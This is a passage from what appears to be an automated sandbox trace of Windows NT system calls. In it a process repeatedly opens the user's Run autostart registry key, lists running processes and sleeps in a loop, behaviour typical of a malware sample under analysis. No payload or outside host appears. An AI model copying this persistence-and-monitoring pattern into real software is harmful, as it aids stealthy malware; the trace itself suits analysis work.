KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.584] NtClose (Handle=0x154) returned 0x0 [0181.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.590] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.600] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.608] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.608] NtClose (Handle=0x154) returned 0x0 [0181.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.612] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.617] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.617] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.617] NtClose (Handle=0x154) returned 0x0 [0181.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.620] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.631] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.631] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.631] NtClose (Handle=0x154) returned 0x0 [0181.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.637] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.647] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.647] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.647] NtClose (Handle=0x154) returned 0x0 [0181.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.650] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.662] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.663] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.663] NtClose (Handle=0x154) returned 0x0 [0181.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.668] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.681] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.681] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.681] NtClose (Handle=0x154) returned 0x0 [0181.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.685] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.694] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.694] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.694] NtClose (Handle=0x154) returned 0x0 [0181.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.697] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.709] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.709] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.709] NtClose (Handle=0x154) returned 0x0 [0181.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.713] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.725] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.725] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.725] NtClose (Handle=0x154) returned 0x0 [0181.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.728] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.741] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.741] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.741] NtClose (Handle=0x154) returned 0x0 [0181.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.745] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.756] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.756] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.756] NtClose (Handle=0x154) returned 0x0 [0181.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.760] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.771] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.772] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.772] NtClose (Handle=0x154) returned 0x0 [0181.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.775] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.787] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.787] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.787] NtClose (Handle=0x154) returned 0x0 [0181.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, 